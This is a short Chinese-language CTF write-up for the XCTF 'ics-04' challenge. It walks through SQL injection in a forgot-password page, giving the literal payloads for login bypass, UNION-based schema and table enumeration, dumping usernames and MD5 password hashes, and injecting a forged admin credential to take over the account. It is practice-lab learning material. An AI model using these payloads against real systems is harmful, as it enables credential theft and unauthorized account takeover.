攻防世界ics-04
题目描述:工控云管理系统新添加的登录和注册页面存在漏洞,请找出flag。
考虑是否存在注入漏洞
只有三个地方可以点,登录,注册,忘记密码
先注册
普通用户登录没什么用,估计得管理员登录
登录和注册页面没有注入点,就忘记密码
测试后存在注入,1’or 1=1#绕过
手工测试,后台过滤了一部分,直接union select,
1’ union select 1,2,3,4#
页面回显正常
查询数据库
1’ union select 1,2,group_concat(schema_name),4 from information_schema.schemata#
数据库cetc004
查表名
1’ union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema = ‘cetc004’#
表名user
查列名
1’ union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name = ‘user’#
表名username,password
查用户
1’ union select 1,2,group_concat(username),4 from cetc004.user#
查密码
1’ union select 1,2,group_concat(password),4 from cetc004.user#
得到密码,md5加密,试着在线解密,失败
1’ union select ‘c3tlwDmIn23’,‘202cb962ac59075b964b07152d234b70’,‘1’,‘2’#
现在用修改密码,把管理员的密码改了
1’ union select ‘c3tlwDmIn23’,‘202cb962ac59075b964b07152d234b70’,‘1’,‘2’#
其中202cb962ac59075b964b07152d234b70是 123 md5加密后的值。
然后重新管理员登陆,用修改了的密码
得到flag
参考文章:https://www.cnblogs.com/suferma/p/12852430.html
萌新一只,感谢大佬
2020.8.3 公瑾